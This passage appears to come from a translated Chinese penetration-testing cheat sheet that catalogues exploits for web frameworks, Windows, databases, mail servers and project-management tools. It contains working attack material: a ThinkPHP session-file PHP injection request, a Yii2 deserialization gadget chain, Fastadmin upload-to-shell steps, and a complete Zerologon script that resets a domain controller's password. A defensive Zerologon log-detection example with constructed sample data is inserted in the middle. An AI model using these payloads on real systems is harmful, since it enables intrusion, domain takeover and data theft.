User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/tp6/public/index.php/index/test1
Cookie: PHPSESSID=1234567890123456789012345678.php;
Upgrade-Insecure-Requests: 1

key=<?php%20phpinfo();?>
```

3. Yii 2 framework deserialization remote command execution vulnerability CVE-2020-15148

exp:
```php
<?php
namespace yii\rest {
    class Action extends \yii\base\Action
    {
        public $checkAccess;
    }
    class IndexAction extends Action
    {
        public function __construct($func, $param)
        {
            $this->checkAccess = $func;
            $this->id = $param;
        }
    }
}
namespace yii\web {
    abstract class MultiFieldSession
    {
        public $writeCallback;
    }
    class DbSession extends MultiFieldSession
    {
        public function __construct($func, $param)
        {
            $this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];
        }
    }
}
namespace yii\base {
    class BaseObject
    {
        //
    }
    class Action
    {
        public $id;
    }
}
namespace yii\db {
    use yii\base\BaseObject;
    class BatchQueryResult extends BaseObject
    {
        private $_dataReader;
        public function __construct($func, $param)
        {
            $this->_dataReader = new \yii\web\DbSession($func, $param);
        }
    }
}
// With bracketed namespaces PHP requires global code to sit in an unnamed namespace block.
// $func and $param are not defined in the snippet as published; the caller supplies them.
namespace {
    $exp = new \yii\db\BatchQueryResult($func, $param);
    print(serialize($exp));
}
```

Reference: https://mp.weixin.qq.com/s/3a3whSUhxMZz2g3btxdytw https://xz.aliyun.com/t/8307

4. Fastadmin file upload vulnerability, severity: high

As the preceding text shows, the exploitation point of this vulnerability is the _empty() function. Note that, according to the official documentation, the _empty() method is normally used to determine whether a method exists; if it does not, control enters this function. Here, however, it is a developer-defined method, so one can pass in the _empty method directly and call the name parameter.

The exploitation process is as follows:

In the front-end member centre, under personal profile, upload a new avatar:

[image: 5.png]

Capture the request and modify the image data (it only needs to satisfy the image header format):

[image: 6.png]

Record the path; getshell succeeds.

[image: 7.png]

On Linux this method fails, because the user directory does not exist under the /public path. From the earlier knowledge point we know that when this directory does not exist, no matter how the directory is traversed, is_file() always returns false, so the vulnerability cannot be exploited, as shown below:

[image: 8.png]

Once we create the /user folder under the /public directory and exploit again, it succeeds:

[image: 9.png]

Reference: https://www.cnpanda.net/codeaudit/777.html

5. ThinkAdmin directory traversal / arbitrary file read CVE-2020-25540

Reference: https://github.com/zoujingli/ThinkAdmin/issues/244

V. Operating systems

1. Windows Netlogon elevation of privilege vulnerability CVE-2020-1472

Exploitation conditions:

An unauthenticated attacker can exploit this vulnerability by using the Netlogon Remote Protocol (MS-NRPC) to connect to a domain controller. An attacker who successfully exploits it can obtain domain administrator access.

Exploit script 1 (blank the password) and exploit script 2 (restore the password) can be downloaded to getshell.

```python
#!/usr/bin/env python3
#
# CVE-2020-1472 - Zerologon
#
# Paper: https://www.secura.com/pathtoimg.php?id=2055
# PoC by: Pablo Martínez (@xassiz) && Antón Ortigueira (@antuache) from BlackArrow
# Web: [www.blackarrow.net] - [www.tarlogic.com]
#

from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRENUM, NDRUNION, NDRPOINTER, NDRUniConformantArray, \
    NDRUniFixedArray, NDRUniConformantVaryingArray
from impacket.dcerpc.v5.dtypes import WSTR, LPWSTR, DWORD, ULONG, USHORT, PGUID, NTSTATUS, NULL, LONG, UCHAR, PRPC_SID, \
    GUID, RPC_UNICODE_STRING, SECURITY_INFORMATION, LPULONG

from impacket.dcerpc.v5.nrpc import *
from impacket.dcerpc.v5 import nrpc, epm
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport
from impacket import crypto

import hmac, hashlib, struct, sys, socket, time
from binascii import hexlify, unhexlify
from subprocess import check_call
from struct import pack, unpack

# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be necessary on average.
MAX_ATTEMPTS = 2000 # False negative chance: 0.04%

def fail(msg):
    print(msg, file=sys.stderr)
    print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
    sys.exit(2)

def try_zero_authenticate(dc_handle, dc_ip, target_computer):
    # Connect to the DC's Netlogon service.
    binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
    rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
    rpc_con.connect()
    rpc_con.bind(nrpc.MSRPC_UUID_NRPC)

    # Use an all-zero challenge and credential.
    plaintext = b'\x00' * 8
    ciphertext = b'\x00' * 8

    # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
    flags = 0x212fffff

    # Send challenge and authentication request.
    nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
    try:
        server_auth = nrpc.hNetrServerAuthenticate3(rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,target_computer + '\x00', ciphertext, flags)

        # It worked!
        assert server_auth['ErrorCode'] == 0
        return rpc_con

    except nrpc.DCERPCSessionError as ex:
        # Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
        if ex.get_error_code() == 0xc0000022:
            return None
        else:
            fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
    except BaseException as ex:
        fail(f'Unexpected error: {ex}.')


def perform_attack(dc_handle, dc_ip, target_computer):
    # Keep authenticating until successful. Expected average number of attempts needed: 256.
    print("[!] CVE-2020-1472 PoC by BlackArrow (Tarlogic)\n")
    print('Performing authentication attempts...')
    rpc_con = None
    for attempt in range(0, MAX_ATTEMPTS):
        rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)

        if rpc_con == None:
            print('=', end='', flush=True)
        else:
            break

    if rpc_con:
        print('\nSuccess! DC can be fully compromised by a Zerologon attack. (attempt={})'.format(attempt))
    else:
        print('\nAttack failed. Target is probably patched.')
        sys.exit(1)

    return rpc_con


def get_authenticator(cred=b'\x00' * 8):
    authenticator = nrpc.NETLOGON_AUTHENTICATOR()
    authenticator['Credential'] = cred
    authenticator['Timestamp'] = 0
    return authenticator


class NetrServerPasswordSet2(NDRCALL):
    opnum = 30
    structure = (
        ('PrimaryName', PLOGONSRV_HANDLE),
        ('AccountName', WSTR),
        ('SecureChannelType', NETLOGON_SECURE_CHANNEL_TYPE),
        ('ComputerName', WSTR),
        ('Authenticator', NETLOGON_AUTHENTICATOR),
        ('ClearNewPassword', NL_TRUST_PASSWORD),
    )

class NetrServerPasswordSet2Response(NDRCALL):
    structure = (
        ('ReturnAuthenticator', NETLOGON_AUTHENTICATOR),
        ('ErrorCode', NTSTATUS),
    )


def passwordSet2(rpc_con, dc_name, target_account):
    dce = rpc_con

    if dce is None:
        return

    request = NetrServerPasswordSet2()
    request['PrimaryName'] = dc_name + '\x00'
    request['AccountName'] = target_account + '\x00'
    request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
    request['ComputerName'] = dc_name + '\x00'
    request['Authenticator'] = get_authenticator()

    clear = NL_TRUST_PASSWORD()
    clear['Buffer'] = b'\x00' * 516
    clear['Length'] = '\x00' * 4
    request['ClearNewPassword'] = clear

    try:
        print()
        resp = dce.request(request)
        resp.dump()
        print("[+] CVE-2020-1472 exploited\n")
    except Exception as e:
        raise
    dce.disconnect()


if not (3 <= len(sys.argv) <= 4):
    print('Usage: CVE-2020-1472.py <nbios-name> <computer> <dc-ip>\n')
    print('Performs the Zerologon attack and resets the computer password of the domain controller.')
    print('Note: nbios-name should be the (NetBIOS) computer name of the domain controller.')
    sys.exit(1)
else:
    [_, nbios_name, computer, dc_ip] = sys.argv

    nbios_name = nbios_name.rstrip('$')
    rpc_con = perform_attack('\\\\' + nbios_name, dc_ip, nbios_name)

    passwordSet2(rpc_con, nbios_name, computer)

    rpc_con.disconnect()
```
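The exploitation conditions above describe what the attacker needs; the matching detection question is what the domain controller logs when the attack lands. The following Python is an added example, not part of the PoC and not Microsoft tooling: it scans an event export for Event ID 4742 (computer account changed) where the subject is ANONYMOUS LOGON and the target is a machine account (the password reset performed by `passwordSet2` above runs over a Netlogon session that was never authenticated), and for the 5827/5828/5829 Netlogon events that DCs with the August 2020 update emit for vulnerable secure-channel connections. The export format (one JSON object per line), the field names beyond the standard Security-log `SubjectUserName`/`TargetUserName`, and every sample record are constructed.

```python
import json

# 4742: "A computer account was changed". Zerologon resets the DC machine-account password
# over an unauthenticated Netlogon session, so the subject shows up as ANONYMOUS LOGON.
EVENT_COMPUTER_ACCOUNT_CHANGED = 4742
# Netlogon events added by the August 2020 update: 5827/5828 = vulnerable secure-channel
# connection denied, 5829 = allowed (deployment phase, before enforcement).
EVENTS_VULNERABLE_NETLOGON = {5827, 5828, 5829}
ANONYMOUS_LOGON = "ANONYMOUS LOGON"


def parse_event_lines(lines):
    """Parse one JSON object per line (constructed export format); skip lines that are not JSON."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def detect_zerologon(events):
    """Return findings (dicts) for events consistent with CVE-2020-1472 exploitation."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == EVENT_COMPUTER_ACCOUNT_CHANGED:
            subject = str(ev.get("SubjectUserName", "")).upper()
            target = str(ev.get("TargetUserName", ""))
            # A machine rotating its own password has itself as subject; an anonymous
            # subject changing a machine account is the Zerologon signature.
            if subject == ANONYMOUS_LOGON and target.endswith("$"):
                findings.append({"rule": "computer-account-changed-by-anonymous",
                                 "target": target,
                                 "computer": ev.get("Computer"),
                                 "time": ev.get("TimeCreated")})
        elif eid in EVENTS_VULNERABLE_NETLOGON:
            findings.append({"rule": "vulnerable-netlogon-connection",
                             "event_id": eid,
                             "computer": ev.get("Computer"),
                             "time": ev.get("TimeCreated")})
    return findings


# Constructed sample export; not real log data. DC01/WS07/corp.example are placeholders.
SAMPLE_EVENT_LINES = [
    '{"EventID": 4624, "Computer": "DC01.corp.example", "TimeCreated": "2020-09-15T10:01:02Z",'
    ' "SubjectUserName": "alice", "TargetUserName": "alice"}',
    '{"EventID": 4742, "Computer": "DC01.corp.example", "TimeCreated": "2020-09-15T10:02:10Z",'
    ' "SubjectUserName": "WS07$", "TargetUserName": "WS07$"}',
    '{"EventID": 5829, "Computer": "DC01.corp.example", "TimeCreated": "2020-09-15T10:03:54Z"}',
    '{"EventID": 4742, "Computer": "DC01.corp.example", "TimeCreated": "2020-09-15T10:03:55Z",'
    ' "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "DC01$"}',
    'not json at all',
]


def run_sample():
    """Findings over the constructed sample; used by the usage below and by the test."""
    return detect_zerologon(parse_event_lines(SAMPLE_EVENT_LINES))


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

The 4742 rule is the high-confidence one: a routine machine-password rotation has the computer itself as the subject, never ANONYMOUS LOGON. The 5829 events are noisier (they also fire for legitimate but non-compliant devices during the deployment phase) and are better treated as an inventory of what will break once enforcement mode is enabled than as an alert on their own.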

Reference links: https://mp.weixin.qq.com/s/MagXtN1hfNPTQdcIMDOZEA

https://github.com/blackarrowsec/redteam-research

https://www.cnblogs.com/forforever/p/13682344.html

https://mp.weixin.qq.com/s/f1f1nGSMdEXJL3lY7FCMMw

2. EternalBlue MS17-010

A powerful tool for scoring points on internal networks.

VI. Databases

1. Redis

Summary of exploiting Redis unauthorized access
Redis 4.x RCE
Collection of Redis exploitation techniques
Collection of historical Redis vulnerabilities

2. Hadoop

Exploiting the Hadoop YARN REST API unauthorized access vulnerability

3. MySQL

MySQL privilege escalation (CVE-2016-6663 and CVE-2016-6664 combined in practice)
Summary of MySQL database penetration and exploitation
MySQL injection collection
Several ways to getshell via phpMyAdmin
UDF privilege escalation on newer MySQL versions
Collection of historical MySQL vulnerabilities

4. MSSQL

MSSQL exploitation techniques compiled (the most complete ever)
Summary of MSSQL database command execution
Privilege escalation via MSSQL impersonation login
Advanced MSSQL injection techniques
Executing commands with MSSQL CLR assemblies

5. NoSQL

Summary of NoSQL database exploitation methods

VII. Mail

Reference: https://mp.weixin.qq.com/s/wiZJUQ6Un9UuE98YFBYWig

1. Exchange

CVE-2020-17083 Microsoft Exchange Server remote code execution vulnerability

Microsoft Exchange remote code execution vulnerability (CVE-2020-16875)

CVE-2020-0688: remote code execution vulnerability in Microsoft Exchange

Microsoft Exchange arbitrary user impersonation vulnerability

Collection of historical Exchange vulnerabilities

2. Coremail

Coremail configuration information disclosure and unauthorized API access vulnerability

Stored XSS vulnerability in Coremail

Collection of historical Coremail vulnerabilities

VIII. Project management

1. 禅道 (ZenTao)

CNVD-C-2020-121325 ZenTao open-source edition file upload vulnerability

ZenTao 9.1.2 login-free SQL injection vulnerability

ZenTao ≤ 12.4.2 back-end administrator getshell

ZenTao 9.1.2 access control logic vulnerability

ZenTao version 826 getshell under certain conditions

ZenTao remote code execution vulnerability

ZenTao 11.6 arbitrary file read

2. Jira

Atlassian Jira vulnerability grab bag

Jira Service Desk path traversal leading to sensitive information disclosure (CVE-2019-14994)

Jira unauthenticated SSRF vulnerability (CVE-2019-8451)

Atlassian Jira server template injection vulnerability (CVE-2019-11581)

CVE-2019-8449 Jira information disclosure vulnerability

Collection of historical Jira vulnerabilities

Update notes:

[2021.1.21: updated the database, mail and project management sections] Reference: https://mp.weixin.qq.com/s/wiZJUQ6Un9UuE98YFBYWig

[2020.10.27: updated the operating systems section]